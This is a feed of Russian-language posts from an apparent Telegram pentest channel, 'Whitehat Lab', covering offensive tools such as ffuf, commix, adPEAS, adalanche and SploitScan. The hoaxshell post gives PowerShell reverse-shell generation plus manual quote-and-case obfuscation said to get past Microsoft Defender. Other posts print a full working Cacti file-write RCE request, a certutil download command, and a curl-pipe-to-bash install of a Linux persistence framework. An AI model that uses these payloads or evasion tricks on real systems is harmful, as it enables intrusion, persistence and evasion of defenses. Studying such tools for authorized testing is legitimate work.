⚙️ ffuf - Fuzz Faster U Fool v2.1.0
💻 Очень быстрый веб фаззер написанный на 🖼️ Go
Fuzzing - перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В💻 Kali установлен по умолчанию.
Установка:
Основные фильтры:
Заворачиваем в😈 Burp (proxy):
Флаг
💻 Home
#ffuf #fuzzing #fuzzer #golang
✈️ Whitehat Lab
Fuzzing - перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В
Установка:
go install github.com/ffuf/ffuf/v2@latest
Примеры использования:ffuf -w /wordlists/rockyou.txt -u https://example.com/FUZZ
ffuf -w /wordlists/rockyou.txt -u https://example.com/page.php?FUZZ=1
ffuf -w /wordlists/rockyou.txt -u https://example.com -H "Host: FUZZ.example.com"
Основные фильтры:
fc - HTTP status (-fc 404)
fs - размер ответа (-fs 0)
fl - кол-во линий (-fl 16)
fw - кол-во слов (-fw 2)
Заворачиваем в
-x "https://127.0.0.1:8080"Флаг
-c сделает вывод цветным, рекомендую, по дефолту - False#ffuf #fuzzing #fuzzer #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
😁1
7 уроков от Microsoft
Что охватывает курс
🔧 Примеры инструментов, используемых для реализации мер безопасности
Чего курс не охватывает
#microsoft #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Замечательный open source продукт которым пользуются кибер-криминалисты по всему миру. Это графический интерфейс для коллекции утилит под названием The Sleuth Kit (TSK)
Работает с образами дисков и не только, список поддерживаемых файловых систем:
NTFS, FAT, ExFAT, UFS 1, UFS 2, EXT2FS, EXT3FS, Ext4, HFS, ISO 9660, и YAFFS2В
sudo apt install autopsyТакже есть версии для Windows, Linux и OS X
#autopsy #sleuthkit #forensics #dfir
Please open Telegram to view this post
VIEW IN TELEGRAM
Основные инструменты:
gem install zsteg
zsteg -a pic.png
pip install --user git+https://github.com/Hedroed/png-parser
png-parser pic.png
sudo apt install steghide
steghide extract -sf pic.jpg
sudo apt install ./stegseek_0.6-1.deb
stegseek pic.jpg rockyou.txt
pip3 install stegoveritas
stegoveritas pic.png
java -jar StegSolve.jar
exiftool pic.png
sudo apt install pngcheck
pngcheck -v pic.png
pip3 install stegpy
stegpy pic.png
#steganography #tools #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Шпаргалка по скриптам, библиотекам и бинарным файлам в ОС
Вбиваем название утилиты и смотрим как с ней можно взаимодействовать
Например - Certutil.exe
Можем скачать файл из сети:
certutil.exe -urlcache -split -f https://7-zip.org/a/7z1604-x64.exe 7zip.exe
#lolbas #cheatsheet #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Указываем доступный нам вид реквизитов (логин, пароль, хеш, билет и т.д.) и сервис покажет что и как мы можем использовать.
https://wadcoms.github.io
#windows #activedirectory #wadcoms #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 hoaxshell
Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)
Установка:
Примеры:
-i -
-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация
Полезные ключи
Ручная обфускация:
Надо заменить
Примеры:
С реГисТром можно и нужно играться
😹 Home
#hoaxshell #powershell #python #soft #manual
✈️ Whitehat Lab
Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)
Установка:
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
Примеры:
python3 hoaxshell.py -s 192.168.1.36 -iro -H "Authorization"
-i -
Invoke-RestMethod вместо Invoke-WebRequest-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация
Полезные ключи
-ng и -lt для создания ngrok или localtunnel сессииРучная обфускация:
Надо заменить
Invoke-RestMethod и Invoke-WebRequest на аналоги и/или напихать кавычек. Мы же любим кавычки ? 😃Примеры:
i''nV''okE-R''eStMe''Th''oD
ir''M
i''eX
Ir''M
С реГисТром можно и нужно играться
#hoaxshell #powershell #python #soft #manual
Please open Telegram to view this post
VIEW IN TELEGRAM
UPD. Большой апдейт до major ветки 4.0
Комбайн для эксплуатации Command Injection уязвимостей, написан на python
В
git clone https://github.com/commixproject/commix.git commix
python commix.py -h
"Детский" режим:
python commix --wizard
Обычный запуск:
python commix -u https://62.173.140.174:16016/ --data 'action='
Поддержка тамперов:
python commix -u https://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs
Список тамперов:
python commix --list-tampers#commix #python #pentest #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Отличный инструмент для проведения enumeration в
UPD. Добавили поддержку Windows 2025
Представлен в 2х вариантах, стандарт и лайт
Полная версия имеет встроенный модуль SharpHound для сбора информации в
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Варианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
#soft #powershell #activedirectory #enumeration
Please open Telegram to view this post
VIEW IN TELEGRAM
Arbitrary File Creation leading to RCE
Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта
PoC:
POST https://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: https://192.168.178.78
Connection: keep-alive
Referer: https://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0
__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save
#web #rce #cacti #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.
Состоит из трёх частей: заголовок, пейлоад и подпись
Пример простейшей реализации на Python
import json
import hmac
import hashlib
import base64
import uuid
header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())
def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))
merge_payload_header = b'.'.join(jwt_parts)
signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))
return b'.'.join(jwt_parts)
print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))
#jwt #token #flask #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление отличного кроссплатформенного инструмента для визуализации, построения графов, связей и исследования Active Directory.
Даст мгновенные результаты, показывая, какие разрешения имеют пользователи и группы в
Проект активно развивается. Написан на
Отличия от
Не требуется Neo4J, Python
Не требуется предварительной настройки
Для построения запросов используется расширенный LDAP синтаксис
Наличие бесплатной и коммерческой версии
Машина в домене:
adalanche.exe collect activedirectory
Машина не в домене:
adalanche.exe collect activedirectory --ignorecert --domain contoso.local --authdomain CONTOSO --username dom_user --password P@ssw0rd
Будет создана папка
dataАнализ:
adalanche.exe analyze
#adalanche #golang #soft #activedirectory
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1
MAP | Kaspersky Cyberthreat live map
Find out if you’re under cyber-attack here #CyberSecurityMap #CyberSecurity
Небольшая подборка онлайн карт кибер угроз
#security #maps #threats
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление открытого шестнадцатеричного редактора для работы в
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на
#imhex #soft #cplusplus
Please open Telegram to view this post
VIEW IN TELEGRAM
В далеком 2014 году зарегистрировал аккаунт в данном сервисе, сколько там сохранено записей трудно даже представить, а теперь и не узнать вовсе.
Вчера вечером не получилось войти с валидными кредами и я попробовал зарегистрировать новый аккаунт на свой же
Знаю, что их несколько раз удачно "пентестили" 😂 И предпосылки сменить данный сервис имелись, но как всегда было лень и не доходили руки, теперь дошли.
Сказать что я чуть [цензура], ничего не сказать, доверие к подобным сервисам упало до нуля и было принято волевое решение использовать -
Благо с памятью у меня все в порядке и почти все необходимое помню наизусть, что не вспомню, буду восстанавливать.
Ну а вы друзья, товарищи, чем подобным пользуетесь ?
#keepassxc #passwords
Please open Telegram to view this post
VIEW IN TELEGRAM
Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой
Установка в
sudo apt install sploitscan
В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
PyPi:
pip install --user sploitscan
Источники PoC'ов:
➡️ GitHub➡️ ExploitDB➡️ VulnCheck (нужен free API key)➡️ Packet Storm➡️ Nuclei
Импорт из:
Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)
В конфиге указываем API ключи поддерживаемых сервисов (config.json)
{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}Поиск по CVE:
sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413
Поиск по ключевым словам:
sploitscan -k "Outlook Express"
Импорт и экспорт:
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -e {json,csv,html}
Помощь AI:
sploitscan --ai openai CVE-2024-21413
┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...
#sploitscan #poc #cve #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Конечно, тут далеко не всё, с чем приходится иметь дело, но базовые утилиты и инструменты я постарался указать. Пишите в комментарии свои любимые инструменты и сервисы.
#soft #kit #tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Мощный, модульный и легко настраиваемый framework для закрепления в
Запуск:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash
#soft #shell #linux #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
HADESS
The Art Of Linux Persistence - HADESS
Account Creation in Linux Linux operating system can usually have two types of account “Root” and “User” account. There are two usually two ways to manipulate the Accounts to maintain the persistence access to the machine : User Account Creation If we (attacker)…
#linux #persistence #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Невероятно подробная шпаргалка по пентесту AD инфраструктуры. Лучше не встречал. Рекомендую!
АХТУНГ! Огромное разрешение 19148x7303
#activedirectory #pentest #cheatsheet #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
Очередная уязвимость в популярном JS фреймворке
Next.js использует хедер x-middleware-subrequest, для предотвращения рекурсивных запросов
Уязвимость позволяет обойти проверки авторизации, выполняемые в промежуточном программном обеспечении Next.js, что потенциально позволяет злоумышленникам получить доступ к конфиденциальным данным
Недостаток устранен в версиях 12.3.5, 13.5.9, 14.2.25 и 15.2.3
Подробный разбор (на англ.)
id: nextjs-CVE-2025-29927
info:
name: Next.js - CVE-2025-29927
author: 6mile
severity: critical
description: |
Next.js has a critical vulnerability that allows attackers to bypass authentication entirely when the application utilizes middleware for authorization.
reference:
- https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw
- https://zeropath.com/blog/nextjs-middleware-cve-2025-29927-auth-bypass
metadata:
verified: true
vendor: vercel
product: next.js
framework: node.js
shodan-query:
- http.html:"/_next/static"
- x-powered-by: next.js
- x-nextjs-cache:
- cpe:"cpe:2.3:a:zeit:next.js"
fofa-query: body="/_next/static"
tags: nextjs,cve-2025-29927
http:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
name: Next.js
part: header
words:
- 'x-nextjs-cache:'
- 'x-powered-by: next.js'
- 'x-nextjs-prerender:'
- 'x-nextjs-stale-time:'
- 'set-cookie: NEXT_LOCALE='
condition: or
case-insensitive: true
- type: word
name: Next.js Middleware
part: header
words:
- 'x-middleware-rewrite:'
- 'x-middleware-set-cookie:'
condition: or
case-insensitive: true
- type: status
status:
- 200
#web #pentest #nextjs #cve
Please open Telegram to view this post
VIEW IN TELEGRAM